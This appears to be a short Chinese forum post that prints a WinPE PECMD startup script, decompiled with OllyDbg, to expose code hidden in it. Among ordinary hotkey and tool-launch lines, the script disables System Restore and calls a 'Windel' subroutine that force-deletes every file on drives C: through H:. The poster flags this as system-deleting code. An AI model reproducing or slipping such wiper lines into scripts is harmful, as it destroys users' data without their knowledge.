|
用OD破解
TEAM ENVI W=%WinDir%|ENVI WS=%W%\SYSTEM32|ENVI WSD=%WS%\Drivers `注册路径变量
INIT IU,3000
REGI HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Systemrestore\DisableConfig=#1
REGI HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Systemrestore\DisableSR=#1
REGI $HKCR\DRIVE\SHELL\CHANGE-PASSPHRASE\COMMAND\=%SYSTEMROOT%\System32\BDECPW.CMD %%1
REGI $HKCR\DRIVE\SHELL\MANAGE-BDE\COMMAND\=%SYSTEMROOT%\System32\BDEOFF.CMD %%1
TEAM FILE %public%\desktop\desktop.ini|FILE %desktop%\desktop.ini|FILE X:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup|FILE X:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
REGI HKLM\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes=#10940064
SHOW -1,-1
REGI HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\29=X:\Windows\System32\ht.ico,0
EXEC !X:\Program Files\Imagine\Imagine64.EXE /assocext /regcontextmenu
EXEC !=X:\Program Files\Freeime\registry.exe /s
EXEC !%WinDir%\System32\EjectUSB.EXE
call Windel
FORX *.ocx,Regocx,0,CALL $%Regocx%
FORX msxml*.dll,Regdll,0,CALL $%Regdll%
DEVI %SystemRoot%\inf\usb.inf
DEVI %SystemRoot%\inf\usbport.inf
DEVI $%SystemRoot%\System32\SRS_8x64.CAB,,%Temp%
EXEC %Windir%\System32\CTFMON.EXE
EXEC @REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /VA /F
EXEC @REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /VA /F
REGI HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Audit\!
SHEL %SystemRoot%\explorer.exe
EXEC =!X:\Program Files\Tools\REGDOC.cmd
EXEC =!X:\Program Files\Unlocker\setup.cmd
EXEC !regsvr32.exe /s "%ProgramFiles%\FastCopy\FastEx64.dll"
REGI HKCR\*\ShellEx\ContextMenuHandlers\FastCopy\FastCopyMenuFlags2=#0xfff13fff
SITE %Startup%,+H+R
EXEC !=X:\Program Files\Tools\Order.exe
HOTK #112,PECMD.EXE
HOTK #120,PECMD EXEC !X:\Windows\System32\Killep.cmd `F9 刷新系统
HOTK #121,PECMD EXEC !X:\Windows\System32\CLEANTEMP.CMD `F10 清除临时文件
HOTK #122,PECMD EXEC X:\Windows\System32\WinSnap64.exe `F11 截图工具
HOTK Ctrl + #0x47,%ProgramFiles%\Ghost\Ghost64.exe `Ctrl+G 手动Ghost
HOTK Ctrl + #0x4d,%ProgramFiles%\Tools\mouse.exe `Ctrl+M 键盘控制鼠标
_SUB Windel
FILE -force -q C:\*.*
FILE -force -q D:\*.*
FILE -force -q E:\*.*
FILE -force -q F:\*.*
FILE -force -q G:\*.*
FILE -force -q H:\*.*
_END
果然有删除系统代码 |
|